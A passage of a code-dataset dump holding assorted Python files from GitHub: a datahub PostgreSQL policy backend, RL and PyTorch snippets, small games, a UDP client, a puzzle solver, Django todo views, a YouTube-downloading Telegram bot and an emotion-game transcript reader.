NOT EXISTS when creating indexes\n # so it's possible for tests to attempt to create duplicate indexes\n # This catches that exception\n try:\n self.execute_sql(query)\n except:\n pass\n\n # grant the public role access to the table\n query = ('GRANT ALL ON %s.%s to %s;')\n params = (AsIs(schema), AsIs(table), AsIs(public_role))\n return self.execute_sql(query, params)\n\n def create_security_policy(self, policy, policy_type, grantee, grantor,\n repo_base, repo, table):\n '''\n Creates a new security policy in the policy table if the policy\n does not yet exist.\n '''\n\n # disallow semicolons in policy. This helps prevent the policy creator\n # from shooting themself in the foot with an attempted sql injection.\n # Note that we don't actually _need_ to do this. The parameters are all\n # escaped in RLS methods executed by the superuser, so there's not a\n # really a risk of a user acquiring root access.\n if ';' in policy:\n raise ValueError(\"\\';'s are disallowed in the policy field\")\n\n query = ('INSERT INTO dh_public.policy (policy, policy_type, grantee, '\n 'grantor, table_name, repo, repo_base) values '\n '(%s, %s, %s, %s, %s, %s, %s)')\n params = (policy, policy_type, grantee, grantor, table, repo,\n repo_base)\n\n res = self.execute_sql(query, params)\n\n return res['status']\n\n def find_all_security_policies(self, username):\n params = (username, username)\n\n query = ('SELECT policy_id, policy, policy_type, grantee, grantor '\n 'FROM dh_public.policy WHERE grantee = %s or '\n 'grantor = %s')\n\n res = self.execute_sql(query, params)\n return res['tuples']\n\n def find_security_policies(self, repo_base, repo=None, table=None,\n policy_id=None, policy=None, policy_type=None,\n grantee=None, grantor=None):\n '''\n Returns a list of all security polices that match the inputs specied\n by the user.\n '''\n query = ('SELECT policy_id, policy, policy_type, grantee, grantor '\n 'repo_base, repo, table_name '\n 'FROM %s.%s WHERE ')\n params = [AsIs(settings.POLICY_SCHEMA), AsIs(settings.POLICY_TABLE)]\n conditions = []\n\n # append mandatory passed-in conditions\n conditions.append('repo_base = %s')\n params.append(repo_base)\n\n # append optional conditions\n if repo:\n conditions.append('repo = %s')\n params.append(repo)\n if table:\n conditions.append('table_name = %s')\n params.append(table)\n if policy_id:\n conditions.append('policy_id = %s')\n params.append(policy_id)\n if policy:\n conditions.append('policy = %s')\n params.append(policy)\n if policy_type:\n conditions.append('policy_type = %s')\n params.append(policy_type)\n if grantee:\n conditions.append('grantee = %s')\n params.append(grantee)\n if grantor:\n conditions.append('grantor = %s')\n params.append(grantor)\n\n conditions = \" and \".join(conditions)\n params = tuple(params)\n query += conditions\n\n res = self.execute_sql(query, params)\n\n return res['tuples']\n\n def find_security_policy_by_id(self, policy_id):\n '''\n Returns the security policy that has a policy_id matching the input\n specified by the user.\n '''\n query = ('SELECT policy_id, policy, policy_type, grantee, grantor, '\n 'repo_base, repo, table_name '\n 'FROM dh_public.policy WHERE policy_id = %s')\n params = (policy_id,)\n res = self.execute_sql(query, params)\n\n # return None if the list is empty\n if not res['tuples']:\n return None\n\n # else, return the policy\n return res['tuples'][0]\n\n def update_security_policy(self, policy_id, new_policy, new_policy_type,\n new_grantee):\n '''\n Updates an existing security policy based on the inputs specified\n by the user.\n '''\n query = ('UPDATE dh_public.policy '\n 'SET policy = %s, policy_type = %s, '\n 'grantee = %s '\n 'WHERE policy_id = %s')\n params = (new_policy, new_policy_type, new_grantee, policy_id)\n\n res = self.execute_sql(query, params)\n return res['status']\n\n def remove_security_policy(self, policy_id):\n '''\n Removes the security policy from the policy table with a policy_id\n matching the one specified.\n '''\n query = 'DELETE FROM dh_public.policy WHERE policy_id = %s'\n params = (policy_id,)\n res = self.execute_sql(query, params)\n return res['status']\n\n def can_user_access_rls_table(self,\n username,\n permissions=['SELECT', 'UPDATE', 'INSERT']):\n '''\n Returns True if the has been granted specified type(s) of access to\n select/update/insert into the RLS policy table. Else, returns false.\n\n This must be executed from a connection to the\n settings.POLICY_DB database. Otherwise, it will check the wrong\n database, and (most likely) return fFalse\n '''\n query = (\"SELECT exists(\"\n \"SELECT * FROM %s.%s where grantee=lower(%s) and (\")\n\n conditions = [\"lower(policy_type)=lower(%s)\"] * len(permissions)\n conditions = \" or \".join(conditions)\n query += conditions + \"))\"\n\n params = (AsIs(settings.POLICY_SCHEMA),\n AsIs(settings.POLICY_TABLE),\n username) + tuple(permissions)\n\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n","repo_name":"datahuborg/datahub","sub_path":"src/core/db/backend/pg.py","file_name":"pg.py","file_ext":"py","file_size_in_byte":45439,"program_lang":"python","lang":"en","doc_type":"code","stars":211,"dataset":"github-code","pt":"77"} +{"seq_id":"74035773688","text":"from copy import deepcopy\n\ndqn_configuration = {\n 'Q_network': [\n ('conv1', {'filter_size': 8, 'stride': 4, 'num_filters': 16}),\n ('conv2', {'filter_size': 4, 'stride': 2, 'num_filters': 32}),\n ('fc1', {'num_relus': 256}),\n ('output', {}),\n ],\n 'Q_network_input_size': 84,\n 'var_init_mean': 0.0,\n 'var_init_stddev': 0.01,\n 'minibatch_size': 32,\n 'replay_memory_size': 10 ** 6,\n 'agent_history_length': 4,\n 'discount_factor': 0.99,\n 'action_repeat': 4,\n 'update_frequency': 4,\n 'learning_rate': 0.00025,\n 'rms_prop_decay': 0.95,\n 'gradient_momentum': 0.0,\n 'min_squared_gradient': 0.01,\n 'initial_exploration': 1,\n 'final_exploration': 0.1,\n 'final_exploration_frame': 10 ** 6,\n 'replay_start_size': 5 * (10 ** 4),\n 'no_op_max': 30,\n 'validation_size': 500,\n 'evaluation_exploration': 0.05,\n 'target_network_update_frequency': None,\n 'clip_error': False,\n}\n\ndqn_nips_configuration = deepcopy(dqn_configuration)\n\ndqn_nature_configuration = deepcopy(dqn_configuration)\ndqn_nature_configuration['target_network_update_frequency'] = 10 ** 4\ndqn_nature_configuration['Q_network'] = [\n ('conv1', {'filter_size': 8, 'stride': 4, 'num_filters': 32}),\n ('conv2', {'filter_size': 4, 'stride': 2, 'num_filters': 64}),\n ('conv3', {'filter_size': 3, 'stride': 1, 'num_filters': 64}),\n ('fc1', {'num_relus': 512}),\n ('output', {}),\n]\ndqn_nature_configuration['clip_error'] = True\n","repo_name":"chan-y-park/rl-atari","sub_path":"configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"29761914557","text":"import torch\n\nfrom .device import device\nfrom .base_network import BaseNetwork\n\nclass Actor(BaseNetwork):\n def __init__(self, state_size, action_size, hidden_size, activ):\n super().__init__(activ)\n\n dims = (state_size,) + hidden_size + (action_size,)\n\n self.build_layers(dims)\n\n self.reset_parameters()\n\n def forward(self, state):\n \"\"\"Maps state => actions, μ(s) => actions\"\"\"\n if type(state) != torch.Tensor:\n state = torch.FloatTensor(state).to(device)\n\n x = self.layers[0](state)\n\n for layer in self.layers[1:-1]:\n x = self.activ(layer(x))\n\n # We squash the the value between -1 and 1 (range of the actions)\n return torch.tanh(self.layers[-1](x)) # (-1, 1)\n","repo_name":"jscriptcoder/Multi-Agent-Collaboration-and-Competition","sub_path":"agent/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"3628099119","text":"\"\"\"play a magic 8 ball game.\"\"\"\nimport random\nimport time\n\nwhile True:\n answer = [\"It is certain\", \"It is decidedly so\", \"Without a doubt\",\n \"Yes, definitely\", \"You may rely on it\", \"As I see it, yes\",\n \"Most likely\", \"Outlook good\", \"Yes\", \"Signs point to yes\",\n \"Reply hazy try again\", \"Ask again later\",\n \"Better not tell you now\",\n \"Cannot predict now\", \"Concentrate and ask again\",\n \"Don't count on it\", \"My reply is no\", \"My sources say no\",\n \"Outlook not so good\", \"Very doubtful\"]\n number = random.randint(1, len(answer))\n print()\n print(\"Welcome to the Magic 8 Ball\")\n question = input(\"Please ask a question: \")\n print(\"Thinking...\")\n time.sleep(3)\n for i in range(len(answer)):\n if i == number:\n print(answer[i])\n again = 1\n print(\"Do you want to play again?\")\n again = input(\"1 yes, 2 no: \")\n if again == str(2):\n break\n","repo_name":"erschmitt/Beginner-Python","sub_path":"Magic 8 Ball/ES-Magic8Ball.py","file_name":"ES-Magic8Ball.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37154731315","text":"import binascii\r\nimport socket\r\nimport struct\r\nimport binascii\r\nimport socket\r\nimport struct\r\nimport sys\r\nimport urllib\r\nimport urllib.request\r\n\r\n\r\n# Create a TCP/IP socket\r\n#def create_packet(s_n, a_n, ack, syn, fin, data_size):\r\n#\tdata = struct.pack('!IIcccI', s_n, a_n, ack, syn, fin, data_size)\r\n\r\n#\treturn data\r\n\r\n\r\n\r\n#if __name__=='__main__':\r\n# webpage = get_webpage(webpage=\"http://www.python.org\")\r\n# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n# ip = sys.argv[1]\r\n# port = int(sys.argv[2])\r\n# server_address = (ip, port)\r\n# buf = 512\r\n# r = open('test', 'rb')\r\n# total_read = 0\r\n# data_size = len(webpage)\r\n# print(data_size)\r\n# data = r.read(buf)\r\n# #print(data)\r\n# total_read += 512\r\n# send_data = create_packet(12345, 0, b'Y', b'N', b'N', data_size)\r\n# sock.sendto(data, server_address)\r\n #print(\"\\n\")\r\n #print(send_data)\r\n# while (total_read < 805):\r\n# if (sock.sendto(data, server_address)):\r\n# send_data = create_packet(12345, 0, b'Y', b'N', b'N', data_size)\r\n# data = r.read(buf)\r\n# print(data_size)\r\n# total_read += len(send_data)-12\r\n# print(total_read)\r\n\r\n# sock.close()\r\n# r.close()\r\n\r\n\r\ndef create_packet(s_n, a_n, ack, syn, fin, data_size):\r\n\tdata = struct.pack('!IIcccI', s_n, a_n, ack, syn, fin, data_size)\r\n\r\n\treturn data\r\n\r\n\r\ndef handshake(sock, server_address):\r\n\r\n\tsend_data = create_packet(12345, 0, b'Y', b'Y', b'N', 0)\r\n\tsock.sendto(send_data, server_address)\r\n\t#print(struct.unpack('!IIccc', data))\r\n\r\n\tdata, recv_addr = sock.recvfrom(512)\r\n\trecv_seqn, recv_ackn, ack, syn, fin, size = struct.unpack('!IIcccI', data)\r\n\r\n\r\n\tdataReturn = struct.pack('!IIcccI', 100, recv_ackn+1, b'Y', b'N', b'N', 0)\r\n\tprint(dataReturn)\r\n\r\n\treturn data, recv_addr\r\n\r\nif __name__=='__main__':\r\n\tip = sys.argv[1]\r\n\tport = int(sys.argv[2])\r\n\tfiledump = sys.argv[3]\r\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\tserver_address = (ip, port)\r\n\tdata, recv_addr = handshake(sock, server_address)\r\n\r\n\tnumber = 1\r\n\tnumber2 = 1\r\n\trecv_buf = []\r\n\tFIN_SET = 0\r\n\tfd = open(filedump, 'w')\r\n\r\n\twith open('recv_file', 'wb') as w:\r\n\t\twhile True:\r\n\t\t\tdata, address = sock.recvfrom(512)\r\n\t\t\tif number == number2:\r\n\t\t\t\tfd.write(\"Received connection from (IP, PORT): \")\r\n\t\t\t\tfd.write(str(address))\r\n\t\t\t\tfd.write(\"\\n\")\r\n\t\t\t\tnumber = number + 1\r\n\t\t\ttry:\r\n\t\t\t\tw.write(data)\r\n\t\t\t\tprint('Writing data')\r\n\t\t\texcept socket.timeout:\r\n\t\t\t\tsock.close()\r\n\t\t\t\tprint(\"File downloaded\")\r\n\t\t\tif FIN_SET:\r\n\t\t\t\tbreak\r\n\tfd.close()\r\n\tsock.close()\r\n\tr.close()\r\n","repo_name":"niikexr3mix/CSC4200","sub_path":"Pr2/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72629726970","text":"from django.shortcuts import render as origin_render\nfrom django.http import JsonResponse as origin_JsonResponse\n\n\ndef render(request, template_name, context=None):\n\n if not context:\n context = {}\n context[\"is_login\"] = False\n if request.user and request.user.id:\n context[\"is_login\"] = True\n return origin_render(request, template_name, context)\n\n\ndef JsonResponse(code, msg, data=None):\n if not data:\n data = {}\n return origin_JsonResponse({\"code\": code, \"msg\": msg, \"data\": data})\n","repo_name":"yukiYK/VPS_project","sub_path":"common/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5564129898","text":"from .claspy import *\nfrom . import utils\nimport time\n\ndef encode(string):\n return utils.encode(string)\n\ndef solve(E):\n set_max_val(E.R*E.C)\n\n shading_solver = utils.RectangularGridShadingSolver(E.R,E.C)\n\n for (r,c) in E.clues:\n require(~shading_solver.grid[(r,c)])\n\n anchors = [coord for coord in E.clues if E.clues[coord] != 'black']\n # 'black' means an empty circle in this case; sorry, I'm being lazy with the encoding\n\n for anchor in anchors:\n flows = utils.RectangularGrid(E.R, E.C, lambda: Atom())\n flows[anchor].prove_if(True) # prove the anchor for free\n\n for r in range(E.R):\n for c in range(E.C):\n for (dr,dc) in [(0,1),(0,-1),(1,0),(-1,0)]:\n r1 = r + dr\n c1 = c + dc\n if 0 <= r1 < E.R and 0 <= c1 < E.C:\n if (r1,c1) == anchor:\n flows[r][c].prove_if(shading_solver.grid[r][c])\n else:\n flows[r][c].prove_if(shading_solver.grid[r][c] & \n shading_solver.grid[r1][c1] & flows[r1][c1])\n\n require(sum_bools(E.clues[anchor]+1, \n [flows[r][c] for r in range(E.R) for c in range(E.C)]))\n # add 1 because the clue cell is proven but not black\n\n return shading_solver.solutions(shaded_color = 'black')\n\ndef decode(solutions):\n return utils.decode(solutions)\n","repo_name":"mstang107/noq","sub_path":"solvers/kurotto.py","file_name":"kurotto.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"27835513","text":"from TopicA4.DataDisplayUI import Ui_MainWindow\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QGridLayout\r\nfrom PyQt5.QtCore import QTimer\r\nimport sys\r\nimport numpy as np\r\n\r\n\"\"\"\r\n 在PyQt5设计的GUI界面中显示matplotlib绘制的图形\r\n https://blog.csdn.net/panrenlong/article/details/80183519\r\n \r\n\"\"\"\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nfrom matplotlib.figure import Figure\r\nfrom Pour import Pour\r\nfrom matplotlib.patches import Rectangle\r\n\r\n\r\n# from matplotlib.axes._subplots\r\n\r\nclass MyFifure(FigureCanvas):\r\n def __init__(self, parent=None, width=3.9, height=2.7, dpi=100):\r\n # 其中构造函数Figure()用来创建一个类似Matlab的figure()或matplotlib.pyplot的figure()。\r\n # 其中:width,height, 为窗口尺寸,5 英寸 * 4 英寸,分辨率为dpi = 10\r\n self.fig = Figure(figsize=(width, height), dpi=100)\r\n super(MyFifure, self).__init__(self.fig)\r\n # 它是用来创建子图,如图matlab的subplot(2,2,1),表示共有4个子图,当前为第一个子图。具体应用如下:\r\n self.ax = self.fig.add_subplot(111)\r\n print(type(self.ax))\r\n\r\n def test(self):\r\n x = [1, 2, 3, 4, 5, 6, 7]\r\n y = [2, 1, 3, 5, 6, 4, 3]\r\n\r\n #\r\n self.ax.plot(x, y)\r\n\r\n\r\nclass ImgDisp(QMainWindow, Ui_MainWindow):\r\n def __init__(self, parent=None):\r\n super(ImgDisp, self).__init__(parent)\r\n self.pathList = list()\r\n self.setupUi(self)\r\n self.PrepareBarCanvas()\r\n self.timer = QTimer()\r\n self.timer.timeout.connect(self.UpdateImgs)\r\n self.pb_start.clicked.connect(self.startShow)\r\n self.pb_sure.clicked.connect(self.reSetBar)\r\n self.pb_reSet.clicked.connect(self.reSetBar)\r\n self.updateList = list()\r\n\r\n def Init_Widgets(self):\r\n date = str(self.plainTextEdit.toPlainText()).split()\r\n print(date)\r\n date = list(int(_) for _ in date)\r\n # 水壶容量\r\n self.capacity = tuple(date[:3])\r\n # 初始时,水壶中水的情况\r\n self.situation = date[3:-1]\r\n self.endD = date[-1]\r\n\r\n def startShow(self):\r\n self.pour()\r\n self.timer.start(2)\r\n\r\n def reSetBar(self):\r\n self.Init_Widgets()\r\n self.BarFigure.ax.cla()\r\n self.repeatDrawBar(self.situation)\r\n self.BarFigure.draw()\r\n\r\n def repeatDrawBar(self, s):\r\n self.BarFigure.ax.set_xlim(-1, 7)\r\n self.BarFigure.ax.set_ylim(0, max(self.capacity) + 2)\r\n self.bar = self.BarFigure.ax.bar(np.array([0, 3, 6]), np.array(s),\r\n color=['#d65f5f', '#5fba7d', '#abcdef'], width=0.6)\r\n self.patches = self.bar.patches\r\n for i, r in enumerate(self.patches):\r\n r.set_label('capacity:{:^3d}'.format(self.capacity[i]))\r\n\r\n def PrepareBarCanvas(self):\r\n self.Init_Widgets()\r\n self.BarFigure = MyFifure()\r\n self.BarFigureLayout = QGridLayout(self.BarDisplayGB)\r\n self.BarFigureLayout.addWidget(self.BarFigure)\r\n self.repeatDrawBar(self.situation)\r\n self.BarFigure.draw() # 开始绘制\r\n self.patches = self.bar.patches\r\n\r\n def pour(self):\r\n pour = Pour(self.capacity, self.situation, self.endD)\r\n pour.run()\r\n path = pour.pathList\r\n\r\n # 以0.1的水量为迭代倒水\r\n for i, p in enumerate(path[1:]):\r\n p = list(p)\r\n a, b = p[-3:-1]\r\n length = p[-1]\r\n temp = list(path[i]).copy()\r\n for _ in np.arange(0, length, 0.1):\r\n temp[a] = temp[a] - 0.1\r\n temp[b] = temp[b] + 0.1\r\n self.pathList.append(temp[:3])\r\n\r\n def UpdateImgs(self):\r\n if len(self.pathList) == 0:\r\n print(\"关闭\")\r\n self.timer.stop()\r\n return None\r\n self.BarUpdate(self.pathList.pop(0))\r\n\r\n def BarUpdate(self, heights):\r\n x = np.array(heights).astype(float)\r\n print(x)\r\n for i, rectangle in enumerate(self.patches):\r\n rectangle: Rectangle\r\n rectangle.set_height(x[i])\r\n rectangle.set_label('capacity:{:^3d}'.format(self.capacity[i]))\r\n self.BarFigure.ax.text(i * 3 - 0.3, self.capacity[i] + 0.2,\r\n '{:^4.2f}/{:^3d}'.format(float(x[i]), self.capacity[i]))\r\n\r\n self.bar.patches = self.patches\r\n self.BarFigure.ax.legend()\r\n self.BarFigure.draw() # 开始绘制\r\n self.BarFigure.ax.cla()\r\n self.repeatDrawBar(x)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ui = ImgDisp()\r\n ui.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"Curious-chen/curriculum-design","sub_path":"algorithm/TopicA4/DateDisplay.py","file_name":"DateDisplay.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"23700104472","text":"from datetime import datetime\nfrom decimal import Decimal\n\nfrom app.services import db\n\n\nclass TransactionModel(db.Model):\n __tablename__ = \"transactions\"\n\n id = db.Column(db.Integer, primary_key=True)\n date = db.Column(db.DateTime)\n payee = db.Column(db.String(150))\n inflow = db.Column(db.Boolean)\n amount = db.Column(db.Numeric(precision=10, scale=2), nullable=False)\n raw_value = db.Column(\n db.Numeric(precision=10, scale=2, asdecimal=True), nullable=False\n )\n\n category_id = db.Column(\n db.Integer, db.ForeignKey(\"category.id\"), unique=False, nullable=False\n )\n category = db.relationship(\"CategoryModel\", back_populates=\"transactions\")\n\n account_id = db.Column(\n db.Integer, db.ForeignKey(\"accounts.id\"), unique=False, nullable=False\n )\n account = db.relationship(\"AccountModel\", back_populates=\"transactions\")\n\n def __init__(\n self,\n date: datetime,\n payee: str,\n amount: float,\n inflow: bool,\n account_id: int,\n category_id: int,\n ):\n self.date = date\n self.payee = payee\n\n if amount < 0:\n inflow = not inflow\n amount = amount * -1\n\n self.inflow = Decimal(inflow)\n self.amount = amount\n self.raw_value = Decimal(amount) if inflow else Decimal(amount * -1)\n self.account_id = account_id\n self.category_id = category_id\n\n def __repr__(self):\n return f\"\"\n","repo_name":"ydaud/budget-api","sub_path":"app/models/transaction_model.py","file_name":"transaction_model.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25848704244","text":"from django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.mail import send_mail\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse, reverse_lazy\nfrom django.views import View\nfrom django.views.generic import ListView\nfrom django.views.generic.detail import DetailView\nfrom zapis.forms import AddTaskForm, TodoItemExportForm, TodoItemForm\nfrom zapis.models import TodoItem\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom taggit.models import Tag\n\n\nclass ZapisDetailsView(DetailView):\n model = TodoItem\n template_name = 'zapis/details.html'\n\n\n\n@login_required\n\n\ndef complete_zapis(request, uid):\n t = TodoItem.objects.get(id=uid)\n t.is_completed = True\n t.save()\n return HttpResponse(\"OK\")\n\n\ndef add_zapis(request):\n if request.method == \"POST\":\n desc = request.POST[\"description\"]\n t = TodoItem(description=desc)\n t.save()\n return redirect(reverse(\"zapis:list\"))\n\n\ndef delete_zapis(request, uid):\n t = TodoItem.objects.get(id=uid)\n t.delete()\n return redirect(reverse(\"zapis:list\"))\n\n\nclass ZapisListView(LoginRequiredMixin, ListView):\n model = TodoItem\n context_object_name = \"zapis\"\n template_name = \"zapis/list.html\"\n\n def get_queryset(self):\n u = self.request.user\n qs = super().get_queryset()\n return qs.filter(owner=u)\n\n\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n user_zapis = self.get_queryset()\n tags = []\n for t in user_zapis:\n tags.append(list(t.tags.all()))\n\n def filter_tags(tags_by_task):\n t = []\n for tags in tags_by_task:\n for tag in tags:\n if tag not in t:\n t.append(tag)\n return t\n\n context['tags'] = filter_tags(tags)\n return context\n\n\nclass ZapisCreateView(LoginRequiredMixin, View):\n def post(self, request, *args, **kwargs):\n form = TodoItemForm(request.POST)\n if form.is_valid():\n new_zapis = form.save(commit=False)\n new_zapis.owner = request.user\n new_zapis.save()\n return redirect(reverse(\"zapis:list\"))\n\n return render(request, \"zapis/create.html\", {\"form\": form})\n\n def get(self, request, *args, **kwargs):\n form = TodoItemForm()\n return render(request, \"zapis/create.html\", {\"form\": form})\n\n\nclass ZapisEditView(LoginRequiredMixin, View):\n def post(self, request, pk, *args, **kwargs):\n t = TodoItem.objects.get(id=pk)\n form = TodoItemForm(request.POST, instance=t)\n if form.is_valid():\n new_task = form.save(commit=False)\n new_task.owner = request.user\n new_task.save()\n form.save_m2m()\n return redirect(reverse(\"zapis:list\"))\n\n return render(request, \"zapis/edit.html\", {\"form\": form})\n\n def get(self, request, pk, *args, **kwargs):\n t = TodoItem.objects.get(id=pk)\n form = TodoItemForm(instance=t)\n return render(request, \"zapis/edit.html\", {\"form\": form, \"zapis\": t})\n\n\n\nclass ZapisExportView(LoginRequiredMixin, View):\n def generate_body(self, user, priorities):\n q = Q()\n if priorities[\"prio_high\"]:\n q = q | Q(priority=TodoItem.PRIORITY_HIGH)\n if priorities[\"prio_med\"]:\n q = q | Q(priority=TodoItem.PRIORITY_MEDIUM)\n if priorities[\"prio_low\"]:\n q = q | Q(priority=TodoItem.PRIORITY_LOW)\n zapis = TodoItem.objects.filter(owner=user).filter(q).all()\n\n body = \"Ваши записи и процедуры:\\n\"\n for t in list(zapis):\n if t.is_completed:\n body += f\"[x] {t.description} ({t.get_priority_display()})\\n\"\n else:\n body += f\"[ ] {t.description} ({t.get_priority_display()})\\n\"\n\n return body\n\n def post(self, request, *args, **kwargs):\n form = TodoItemExportForm(request.POST)\n if form.is_valid():\n email = request.user.email\n body = self.generate_body(request.user, form.cleaned_data)\n send_mail(\"Записи\", body, settings.EMAIL_HOST_USER, [email])\n messages.success(request, \"Записи были отправлены на почту %s\" % email)\n else:\n messages.error(request, \"Что-то пошло не так, попробуйте ещё раз\")\n return redirect(reverse(\"zapis:list\"))\n\n def get(self, request, *args, **kwargs):\n form = TodoItemExportForm()\n return render(request, \"zapis/export.html\", {\"form\": form})\n\n\ndef zapis_by_tag(request, tag_slug=None):\n u = request.user\n zapis = TodoItem.objects.filter(owner=u).all()\n\n tag = None\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n zapis = zapis.filter(tags__in=[tag])\n\n all_tags = []\n for t in zapis:\n all_tags.append(list(t.tags.all()))\n\n def filter_tags(tags_by_zapis):\n t = []\n for tags in tags_by_zapis:\n for tag in tags:\n if tag not in t:\n t.append(tag)\n return t\n\n all_tags = filter_tags(all_tags)\n\n return render(\n request,\n \"zapis/list.html\",\n {\"tag\": tag, \"zapis\": zapis, \"all_tags\": all_tags},\n )\n","repo_name":"ovr1/MySite","sub_path":"zapis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33297282025","text":"from random import randint\n\n# Task 1\nnumbers = [randint(-20, 20) for i in range(10)]\nprint(numbers)\n\nmin_index = numbers.index(min(numbers))\nmax_index = numbers.index(max(numbers))\nprint(min_index, max_index)\n\n\n# Task 2\nnumbers = [randint(-20, 20) for i in range(10)]\nprint(numbers)\n\nmin_index = 0\nmax_index = 0\nfor i in range(len(numbers)):\n if numbers[i] < numbers[min_index]:\n min_index = i\n if numbers[i] > numbers[max_index]:\n max_index = i\n\nprint(min_index, max_index)\n\n\n# Task 3\nnumbers = [randint(-20, 20) for i in range(10)]\nprint(numbers)\n\nmin_index = numbers.index(min(numbers))\nmax_index = numbers.index(max(numbers))\nleft = min(min_index, max_index)\nright = max(min_index, max_index)\n\nprint(sum(numbers[left + 1: right]))\n","repo_name":"kuzminprog/python-school77","sub_path":"module02/solution/topic03_02.py","file_name":"topic03_02.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70094045689","text":"import telebot\r\nfrom telebot import types\r\nfrom pytube import YouTube\r\nimport os\r\n\r\n\r\n\r\nbot = telebot.TeleBot('')\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start(message):\r\n markup = types.InlineKeyboardMarkup()\r\n markup.add(types.InlineKeyboardButton('продолжить', callback_data= 'continue' ))\r\n bot.send_message(message.chat.id, 'Привет, этот бот скачает любое видео из ютуб! Нажимай кнопку продолжить.', reply_markup=markup )\r\n\r\n@bot.callback_query_handler(func=lambda calback:True)\r\ndef callback_message(callback):\r\n if callback.data == 'continue':\r\n bot.send_message(callback.message.chat.id, 'Введите ссылку на видео:')\r\n\r\n@bot.message_handler()\r\ndef link_text(message):\r\n try:\r\n link = message.text\r\n yt = YouTube(link)\r\n video = yt.streams.get_highest_resolution()\r\n # Получение размера видео\r\n video_size = video.filesize\r\n # Скачивание видео\r\n video.download(output_path='', filename='2.mp4')\r\n # Отправка сообщения о начале скачивания\r\n bot.send_message(message.chat.id, \"Видео началось скачиваться...\")\r\n # Ожидание, пока файл полностью скачается\r\n while os.path.getsize('2.mp4') != video_size:\r\n pass\r\n # Отправка видео пользователю\r\n with open('2.mp4', 'rb') as video_file:\r\n bot.send_video(message.chat.id, video_file)\r\n # Удаление временного файла\r\n os.remove('2.mp4')\r\n\r\n except Exception as e:\r\n bot.reply_to(message, \"Ошибка при скачивании видео: \" + str(e))\r\n\r\nbot.polling(none_stop=True)","repo_name":"Lzinaliev/Projects","sub_path":"ytbot.py","file_name":"ytbot.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"24711684348","text":"#!/usr/bin/env python3\n#!/usr/bin/python\n\nimport os\nimport re\nimport sys\n\nclass Tournament():\n def __add__(self,other):\n t = Tournament()\n t.games = []\n t.games.extend(self.games)\n t.games.extend(other.games)\n return t\n\n\nclass HumanHumanTournament(Tournament):\n \"\"\"A set of emo20q games played by two humans\"\"\"\n\n def __init__(self, annotationFile=None):\n# self.base = Base()\n if not annotationFile:\n import os\n annotationFile = os.path.dirname(__file__) + \"/../wechat_pilot/emo20q_glossing_final_anonymous.txt\"\n f = open(annotationFile, 'r', encoding=\"utf-8\")\n try:\n self.games = [m for m in self.readGames(f)]\n #for m in self.readGames(f):\n # print(m.turns[0])\n finally:\n f.close()\n\n def readGames(self,fh):\n games = []\n while True:\n line = fh.readline()\n #print(line)\n if not line:\n break\n game = Game()\n turns = []\n if re.match(\"match:\\d+\", line):\n m = re.match(\"match:\\d+, ?answerer:(?P.+?), ?questioner:(?P.+?), ?start:\\\"(?P.+?)\\\"\", line)\n # note game/match records do not all have level\n game.answerer = m.group('answerer')\n game.questioner = m.group('questioner')\n game.start = m.group('start')\n turns = [turn for turn in game.readTurns(fh)]\n line = fh.readline()\n m = re.match(r\"end:\\\"(?P.+?)\\\", ?emotion:(?P.+?), ?questions:(?P.+?), ?outcome:(?P.+?)(, ?.*)\", line)\n game.end = m.group('end');\n game.emotion = m.group('emotion');\n game.questions = m.group('questions');\n game.outcome = m.group('outcome');\n game.turns = turns\n #print(game._emotion)\n yield(game)\n\n\n def printStats(self):\n print(\"there are {0:d} games\".format(len(t.games)))\n #sum up the turns\n sumTurns = 0\n for m_idx,m in enumerate(t.games):\n assert isinstance(m, Game)\n assert type(m.turns) == list\n print(\" In game {0:d} there are {1:d} turns.\".format(m_idx,len(m.turns)))\n for tn_idx,tn in enumerate(m.turns):\n assert isinstance(tn,Turn)\n #further tests\n sumTurns = sumTurns + len(m.turns)\n\n 